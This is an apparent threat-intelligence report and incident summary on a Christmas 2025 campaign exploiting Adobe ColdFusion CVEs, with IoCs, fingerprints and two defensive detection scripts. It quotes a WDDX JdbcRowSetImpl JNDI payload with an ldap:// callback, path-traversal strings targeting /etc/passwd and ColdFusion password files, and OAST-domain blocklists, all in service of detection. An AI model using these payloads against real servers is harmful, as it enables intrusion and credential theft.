# Full Report
GreyNoise observed a coordinated exploitation campaign targeting Adobe ColdFusion servers over the Christmas 2025 holiday period. The attack appears to be a single threat actor operating from Japan-based infrastructure (CTG Server Limited). This source was responsible for ~98% of attack traffic, systematically exploiting 10+ ColdFusion CVEs from 2023-2024. The campaign leveraged ProjectDiscovery Interactsh for out-of-band callback verification, with JNDI/LDAP injection as the primary attack vector. The deliberate timing during Christmas Day (68% of traffic) suggests intentional targeting during reduced security monitoring periods.

Compiled IoC data files can be found at https://github.com/GreyNoise-Intelligence/gn-research-supplemental-data/tree/main/2025-12-26-coldfusion.

## Campaign Statistics

| Metric | Value |
|---|---|
| Total Requests | 5,940 |
| Unique Source IPs | 8 |
| Unique Callback Domains | 190 |
| CVEs Targeted | 10+ |
| Countries Targeted | 20 |
| Peak Activity | December 25, 2025 |

## Target Country Breakdown

| Dest. Country | # Sessions |
|---|---|
| United States | 4,044 |
| Spain | 753 |
| India | 128 |
| Canada | 100 |
| Chile | 100 |
| Germany | 100 |
| Pakistan | 100 |
| Cambodia | 51 |
| Ecuador | 50 |
| France | 50 |
| Japan | 50 |
| Panama | 50 |
| Poland | 50 |
| South Africa | 50 |
| Ghana | 48 |
| Kenya | 48 |
| Peru | 48 |
| Sweden | 47 |
| United Kingdom | 44 |
| New Zealand | 29 |

## Threat Actor Infrastructure

### Primary

The dominant threat actor operates from two IPs on CTG Server Limited, a Japan-based hosting provider.

| IP Address | Requests | Percentage | ASN |
|---|---|---|---|
| 134.122.136.119 | 3,188 | 53.7% | AS152194 |
| 134.122.136.96 | 2,683 | 45.2% | AS152194 |

Behavioral Indicators:

- Automated scanning with 1-5 second request intervals
- Both IPs operated concurrently 41% of the time (coordinated infrastructure)
- Cycled through 11 distinct attack types per target
- Shared Interactsh session (subdomain prefixes d56*/d57*)

### Secondary Actors

| IP Address | Organization | Country | Requests | Notes |
|---|---|---|---|---|
| 23.234.85.20 | tzulo, inc. | Canada | 34 | Double-encapsulated traffic (VPN) |
| 38.225.206.87 | Kennies Star India | India | 12 | Paired with .88, identical patterns |
| 38.225.206.88 | Kennies Star India | India | 11 | Paired with .87, identical patterns |
| 172.81.132.99 | DataWagon LLC | United States | 7 | |
| 172.68.119.26 | Cloudflare, Inc. | Japan | 3 | CF-proxied traffic |
| 162.159.110.4 | Cloudflare, Inc. | Japan | 2 | CF-proxied traffic |

## Targeted Vulnerabilities

The campaign exploited the full spectrum of 2023-2024 ColdFusion vulnerabilities:

| CVE | Type | Requests |
|---|---|---|
| Generic RCE | Remote Code Execution | 1,403 |
| Generic LFI | Local File Inclusion | 904 |
| CVE-2023-26359 | Deserialization RCE | 833 |
| CVE-2023-38205 | Access Control Bypass | 654 |
| CVE-2023-44353 | Remote Code Execution | 611 |
| CVE-2023-38203 | Remote Code Execution | 346 |
| CVE-2023-38204 | Remote Code Execution | 346 |
| CVE-2023-29298 | Access Control Bypass | 342 |
| CVE-2023-29300 | Remote Code Execution | 176 |
| CVE-2023-26347 | Access Control Bypass | 171 |
| CVE-2024-20767 | Arbitrary File Read | 146 |
| CVE-2023-44352 | Reflected XSS | 8 |

## Payload Analysis

### Attack Distribution

| Payload Type | Count | Percentage | Purpose |
|---|---|---|---|
| JNDI/LDAP Injection | 189 | 80% | CVE-2023-26359 exploitation |
| WDDX Deserialization | 28 | 12% | JdbcRowSetImpl gadget chain |
| Path Traversal/LFI | 10 | 4% | Credential harvesting |
| JSP Code Injection | 6 | 3% | CVE-2018-15961 verification |
| Command Injection | 1 | | Direct RCE |

### JNDI Injection Details

The primary attack vector uses WDDX deserialization to trigger JNDI lookups:

```xml
<wddxPacket version='1.0'>
  <header/>
  <data>
    <struct type='com.sun.rowset.JdbcRowSetImpl'>
      <var name='dataSourceName'>
        <string>ldap://[callback_domain]/[path]</string>
      </var>
      <var name='autoCommit'>
        <boolean value='true'/>
      </var>
    </struct>
  </data>
</wddxPacket>
```

Gadget Chain: `com.sun.rowset.JdbcRowSetImpl` (JNDI injection via `dataSourceName`)

### LFI Targets

```
../../../../../../../../../../../etc/passwd
i/../lib/password.properties
```

## Callback Infrastructure

### Interactsh OAST Platform

The threat actor uses ProjectDiscovery Interactsh for out-of-band verification of successful exploitation.
Services Used:

| Service | Callbacks | Percentage |
|---|---|---|
| oast.pro | 42 | 22% |
| oast.site | 38 | 20% |
| oast.me | 34 | 18% |
| oast.online | 27 | 14% |
| oast.fun | 25 | 13% |
| oast.live | 24 | 13% |

### Subdomain Pattern Analysis

All callback subdomains follow the Interactsh format: a 33-character alphanumeric string.

Actor Correlation via Prefix:

| Prefix | Actor | Infrastructure |
|---|---|---|
| d56* / d57* | CTG Server Limited | Primary (186 callbacks) |
| d4t* | tzulo, inc. | Secondary (2 callbacks) |
| d4r* | Cloudflare-proxied | Secondary (2 callbacks) |

LDAP Paths Observed:

- `/rcrzfd`: 97 occurrences
- `/zdfzfd`: 92 occurrences

These paths likely differentiate payload variants or target tracking.

## Network Fingerprints

### JA4T (TCP) Signatures

| JA4T Fingerprint | Count | Interpretation |
|---|---|---|
| 64240_2-4-8-1-3_1460_7 | 5,784 | Linux, standard MTU |
| 64240_2-4-8-1-3_1360_7 | 50 | Linux, VPN/tunnel |
| 64620_2-4-8-1-3_1436_7 | 44 | Linux, PPPoE |
| 64740_2-4-8-1-3_1245_7 | 34 | Linux, double-encapsulated |
| 65495_2-4-8-1-3_65495_7 | 23 | Linux, loopback (proxy) |
| 65535_2-4-8-1-3_1460_13 | 5 | Windows |

### JA4H (HTTP) Signatures

| JA4H Fingerprint | Count | Method | Headers |
|---|---|---|---|
| po11nn060000_4ea4093e6290_000000000000_000000000000 | 3,382 | POST | 6 |
| ge11nn040000_532a1ee47909_000000000000_000000000000 | 1,295 | GET | 4 |
| ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000 | 1,257 | GET | 6 |

## Indicators of Compromise

### IP Addresses

```
# Primary Threat Actor (CTG Server Limited) - BLOCK IMMEDIATELY
134.122.136.119
134.122.136.96

# Secondary Actors
23.234.85.20
38.225.206.87
38.225.206.88
172.81.132.99

# Cloudflare-Proxied (may be legitimate traffic behind CF)
172.68.119.26
162.159.110.4
```

### ASN

```
AS152194  # CTG Server Limited - Primary actor
AS11878   # tzulo, inc.
AS150654  # Kennies Star India
AS27176   # DataWagon LLC
```

### DNS Blocklist (Interactsh Callback Domains)

```
*.oast.pro
*.oast.site
*.oast.me
*.oast.online
*.oast.fun
*.oast.live
```

### JA4+ Fingerprints

```
# JA4T (TCP)
64240_2-4-8-1-3_1460_7
64240_2-4-8-1-3_1360_7
64620_2-4-8-1-3_1436_7
64740_2-4-8-1-3_1245_7

# JA4H (HTTP)
po11nn060000_4ea4093e6290_000000000000_000000000000
ge11nn040000_532a1ee47909_000000000000_000000000000
ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000
```

### Sample Callback Domains

```
d4rrp47fn3bphsg36ktgrnxs88i793xh8.oast.fun
d4rrp47fn3bphsg36ktgwmhg6gs184cgp.oast.fun
d4ttv6m52uktrcfij1mg4z1sxco79xbrx.oast.site
d4ttv6m52uktrcfij1mgretwywufsexrr.oast.site
d560h4t0mm9g3ve8u8007go4bggx4mfip.oast.pro
d560h4t0mm9g3ve8u800f5ujdfhi58ty7.oast.pro
d565pronu06u9lln5rug1mt8wad5fbgrk.oast.pro
d565pronu06u9lln5rugt8mt8gngf4m1m.oast.pro
d56bg80or2rkvmbdrmq04dqz3ahrwu8ft.oast.fun
d56bg80or2rkvmbdrmq0gszxyj9npxnx5.oast.fun
```

## Appendix: Attack Timeline

| Date | Hour Range (UTC) | Requests | Primary Actor |
|---|---|---|---|
| Dec 23 | 07:00-15:00 | 37 | Mixed |
| Dec 24 | 08:00-21:00 | 25 | Mixed |
| Dec 25 | 04:00-23:00 | 4,014 | CTG Server Limited |
| Dec 26 | 00:00-10:00 | 1,864 | CTG Server Limited |

Peak Hour: December 25, 15:00 UTC (317 requests)

## References

- CVE-2023-26359 - Adobe ColdFusion Deserialization RCE
- CVE-2023-38205 - Adobe ColdFusion Access Control Bypass
- CVE-2024-20767 - Adobe ColdFusion Arbitrary File Read
- ProjectDiscovery Interactsh - OAST Platform
- JA4+ Fingerprinting - Network Fingerprint Methodology
# Analysis Summary
# Incident Report: Coordinated ColdFusion Christmas Exploitation Campaign
## Executive Summary
A coordinated exploitation campaign targeting Adobe ColdFusion servers was observed during the Christmas 2025 holiday period, exploiting over 10 known CVEs from 2023-2024. The primary threat actor, operating from Japan-based infrastructure (CTG Server Limited), generated approximately 98% of the traffic, primarily utilizing JNDI/LDAP injection to trigger WDDX deserialization. The activity peaked significantly on Christmas Day, indicating deliberate targeting during periods of reduced security team coverage.
## Incident Details
- **Discovery Date:** December 26, 2025 (Based on reporting date following the peak activity)
- **Incident Date:** December 23 – December 26, 2025 (Peak on December 25)
- **Affected Organization:** Organizations running vulnerable instances of Adobe ColdFusion globally.
- **Sector:** Not specified (All organizations running ColdFusion).
- **Geography:** 20 countries targeted globally, with the United States receiving the highest volume of traffic (4,044 sessions).
## Timeline of Events
### Initial Access
- **Date/Time:** Activity observed starting December 23, 07:00 UTC, escalating severely on December 25, 04:00 - 23:00 UTC.
- **Vector:** Weaponized payloads exploiting multiple Adobe ColdFusion CVEs (2023-2024).
- **Details:** Primary method was JNDI/LDAP injection (80% of payloads) achieved via WDDX deserialization, often chaining to the `com.sun.rowset.JdbcRowSetImpl` gadget.
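As an added illustration (not code from GreyNoise or the report), the following Python pre-filter parses a WDDX packet shaped like the one quoted in the full report and flags the `com.sun.rowset.JdbcRowSetImpl` struct type and any JNDI-style URL carried in a string value. The gadget denylist, the scheme list and the sample packets are assumptions made for this example; the placeholder callback host is constructed.

```python
import xml.etree.ElementTree as ET

# Known-dangerous WDDX struct types. Only the gadget class named in the report
# is listed here; a real deployment would extend this from its own telemetry.
DANGEROUS_STRUCT_TYPES = {"com.sun.rowset.JdbcRowSetImpl"}
# URL schemes that a JNDI lookup resolves against a remote server (assumed list).
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://")


def inspect_wddx(packet: str) -> list[str]:
    """Return findings for one WDDX packet; an empty list means nothing suspicious.
    Malformed XML is itself reported, so a broken packet is never waved through."""
    findings = []
    try:
        root = ET.fromstring(packet)
    except ET.ParseError as exc:
        return [f"unparseable WDDX: {exc}"]
    if root.tag != "wddxPacket":
        findings.append(f"root element is <{root.tag}>, not <wddxPacket>")
    for struct in root.iter("struct"):
        jtype = struct.get("type")
        if jtype in DANGEROUS_STRUCT_TYPES:
            findings.append(f"gadget struct type: {jtype}")
        elif jtype:  # any typed struct names a class to deserialize; review it
            findings.append(f"typed struct (review allowlist): {jtype}")
    for var in root.iter("var"):
        name = var.get("name", "?")
        for s in var.iter("string"):
            value = (s.text or "").strip()
            if value.lower().startswith(JNDI_SCHEMES):
                findings.append(f"JNDI URL in var {name!r}: {value}")
    return findings


# Constructed sample shaped like the packet quoted in the report, with a
# placeholder callback host instead of a real Interactsh hostname.
SAMPLE_PACKET = """<wddxPacket version='1.0'><header/><data>
<struct type='com.sun.rowset.JdbcRowSetImpl'>
<var name='dataSourceName'><string>ldap://callback.example.invalid/rcrzfd</string></var>
<var name='autoCommit'><boolean value='true'/></var>
</struct></data></wddxPacket>"""

# Constructed benign packet: an untyped struct carrying a plain string.
BENIGN_PACKET = ("<wddxPacket version='1.0'><header/><data><struct>"
                 "<var name='city'><string>Lima</string></var></struct></data></wddxPacket>")

if __name__ == "__main__":
    for finding in inspect_wddx(SAMPLE_PACKET):
        print("ALERT:", finding)
    print("benign packet findings:", inspect_wddx(BENIGN_PACKET))
```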
### Lateral Movement
- **Details:** No successful lateral movement following initial exploitation is documented; however, the campaign used Local File Inclusion (LFI) techniques (904 requests) against sensitive files such as `/etc/passwd` and `password.properties`, suggesting preparation for credential harvesting or further system compromise.
### Data Exfiltration/Impact
- **Details:** The use of Interactsh indicates the objective was confirmation of Remote Code Execution (RCE) via callback verification. The payloads show attempts at RCE, Access Control Bypass, and Arbitrary File Read against target systems. No data exfiltration was confirmed, but the intent was system compromise.
### Detection & Response
- **Detection:** Observed and categorized by GreyNoise intelligence based on anomalous scanning activity and utilization of OAST platforms (Interactsh).
- **Response Actions:** The primary response noted is the documentation and public sharing of Indicators of Compromise (IoCs) via GitHub for community defense.
## Attack Methodology
The attack used automated, low-and-slow scanning, characteristic of reconnaissance and exploitation attempts designed to stay below monitoring thresholds.
- **Initial Access:** JNDI/LDAP Injection via WDDX Deserialization (targeting CVE-2023-26359 primarily).
- **Persistence:** Not explicitly detailed, but RCE capability would allow for artifact deployment.
- **Privilege Escalation:** Exploitation involved RCE and Access Control Bypass vulnerabilities (CVE-2023-38205, etc.).
- **Defense Evasion:** Exploitation timed during the Christmas holiday when security staffing is typically reduced. Use of an OAST platform (Interactsh) for beaconing confirms exploitation without the actor having to stand up a persistent listener of their own.
- **Credential Access:** Potential through LFI attempts targeting sensitive files.
- **Discovery:** Indirect discovery via LFI attempts (`/etc/passwd`, configuration files).
- **Lateral Movement:** Not the primary focus of observed activity, though RCE could enable it.
- **Collection:** LFI attempts suggest credential harvesting was a secondary goal.
- **Exfiltration:** Confirmation via OAST infrastructure (190 unique callback domains).
- **Impact:** Confirmed network-level callbacks, suggesting successful code execution on vulnerable ColdFusion servers globally.
## Impact Assessment
- **Financial:** Not quantified, but includes potential costs associated with remediation, patching, and incident investigation for targeted organizations.
- **Data Breach:** Potential for compromise leading to data exposure, particularly from LFI targeting credential files.
- **Operational:** Low-level systemic disruption from high-volume automated scanning, but successful RCE could lead to significant localized operational impact.
- **Reputational:** Potential damage to organizations found running unpatched ColdFusion instances targeted during this period.
## Indicators of Compromise
- **Network Indicators (IP Addresses - Block Immediately):**
- Primary Actor (CTG Server Limited): `134.122.136.119`, `134.122.136.96`
- Secondary Actors: `23.234.85.20`, `38.225.206.87`, `38.225.206.88`, `172.81.132.99`
- **ASN Indicators:**
- AS152194 (CTG Server Limited)
- **DNS Blocklist (Interactsh Callback Domains):**
- `*.oast.pro`, `*.oast.site`, `*.oast.me`, `*.oast.online`, `*.oast.fun`, `*.oast.live`
- **Behavioral Indicators:**
- Automated scanning with 1-5 second request intervals.
- Coordinated concurrency between the two primary IPs (41% of the time).
- Network fingerprints (JA4T): `64240_2-4-8-1-3_1460_7` (dominant fingerprint, consistent with a Linux source at standard MTU).
## Response Actions
*Note: Response actions are recommendations based on the threat analysis, as specific organizational response data was not provided.*
- **Containment Measures:** Immediately implement Web Application Firewall (WAF) rules to block traffic originating from the primary threat actor IP addresses and ASN (AS152194).
- **Eradication Steps:** Patch all Adobe ColdFusion instances to address all known 2023 and 2024 CVEs. Conduct forensic analysis on any system showing signs of LFI activity or JNDI connection attempts.
- **Recovery Actions:** Review system logs for evidence of successful payload execution (e.g., unexpected outbound LDAP/DNS requests to Interactsh domains during the attack window).
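As an added example (not from GreyNoise or the report), the Python triage script below applies the report's indicators to constructed WAF-style and egress DNS log lines: it matches the IoC source IPs, URL-decodes each line twice and looks for the payload markers named above (the gadget class, `ldap://`, the two LFI paths), and attributes any Interactsh callback hostname to an actor cluster by the `d56`/`d57`/`d4t`/`d4r` prefix. The log format and the 33-character callback labels are constructed for the example.

```python
import re
from urllib.parse import unquote

# Indicators from the report: the primary-actor pair plus the secondary actor IPs.
IOC_IPS = {"134.122.136.119", "134.122.136.96", "23.234.85.20",
           "38.225.206.87", "38.225.206.88", "172.81.132.99"}
# Interactsh hostname: a 33-char alphanumeric label under one of the oast.* zones.
INTERACTSH_RE = re.compile(r"\b([a-z0-9]{33})\.oast\.(?:pro|site|me|online|fun|live)\b")
PREFIX_TO_ACTOR = {"d56": "CTG Server Limited (primary)",
                   "d57": "CTG Server Limited (primary)",
                   "d4t": "tzulo, inc. (secondary)",
                   "d4r": "Cloudflare-proxied (secondary)"}
# Payload markers from the report, matched case-insensitively after URL-decoding.
PAYLOAD_MARKERS = {"wddx_gadget": "com.sun.rowset.jdbcrowsetimpl",
                   "jndi_ldap": "ldap://",
                   "lfi_passwd": "../etc/passwd",
                   "lfi_cf_creds": "lib/password.properties"}


def triage_line(line: str) -> dict:
    """Return the reasons one log line is suspicious (empty dict = nothing found)."""
    decoded = unquote(unquote(line)).lower()  # decode twice: double-encoded traversal
    reasons = {}
    ip = line.split(" ", 1)[0]
    if ip in IOC_IPS:
        reasons["ioc_ip"] = ip
    for label, marker in PAYLOAD_MARKERS.items():
        if marker in decoded:
            reasons[label] = True
    m = INTERACTSH_RE.search(decoded)
    if m:
        reasons["callback"] = m.group(0)
        reasons["actor"] = PREFIX_TO_ACTOR.get(m.group(1)[:3], "unattributed")
    return reasons


def triage(lines):
    """Map line index -> reasons for every line that produced at least one finding."""
    return {i: r for i, l in enumerate(lines) if (r := triage_line(l))}


# Constructed sample lines: "<client_ip> <verb> <uri> [body=<url-encoded excerpt>]".
# The callback labels are made-up 33-char strings, not real Interactsh hostnames.
CB_PRIMARY = "d56" + "0" * 30 + ".oast.pro"
CB_SECOND = "d4t" + "0" * 30 + ".oast.site"
SAMPLE_LOG = [
    "134.122.136.119 POST /example.cfm body=%3Cstruct%20type%3D%27com.sun.rowset."
    f"JdbcRowSetImpl%27%3E%3Cstring%3Eldap%3A%2F%2F{CB_PRIMARY}%2Frcrzfd%3C%2Fstring%3E",
    "38.225.206.87 GET /example.cfm?f=..%252F..%252F..%252Fetc%252Fpasswd",  # double-encoded
    "203.0.113.7 GET /index.cfm",                                              # benign
    f"10.0.0.5 DNS {CB_SECOND}",                        # egress DNS query from an app server
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_LOG).items():
        print(idx, reasons)
```

The DNS line is the one worth the most attention in practice: a query for an `oast.*` hostname leaving an application server is evidence that a payload executed, not merely that one was sent.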
## Lessons Learned
- **Holiday Vulnerability Targeting:** Threat actors intentionally exploit predictable windows of reduced security monitoring capability (e.g., Christmas holidays).
- **Effectiveness of OAST:** The TTP's strong reliance on OAST (Interactsh) confirms its widespread adoption for reliable, low-footprint validation of RCE exploits.
- **Vulnerability Chaining:** Attackers systematically cycle through a broad range of known, older vulnerabilities (2023/2024 CVEs) rather than focusing on a single zero-day.
## Recommendations
1. **Prioritize ColdFusion Patching:** Ensure an aggressive patching schedule, especially for older, cumulative vulnerabilities that are clearly being weaponized in new campaigns.
2. **Enhance Holiday Monitoring:** Implement elevated monitoring alerts and dedicated on-call rotation during standard slow periods (holidays, weekends) for critical internet-facing services.
3. **Defend Against OAST:** Deploy egress filtering or NDR/DLP capabilities to monitor and alert on outbound connections to known OAST platforms (e.g., Interactsh domains) originating from application servers.
4. **Network Fingerprint Utilization:** Integrate JA4+ signatures into network detection rules for enhanced blocking and forensic analysis of suspicious traffic patterns.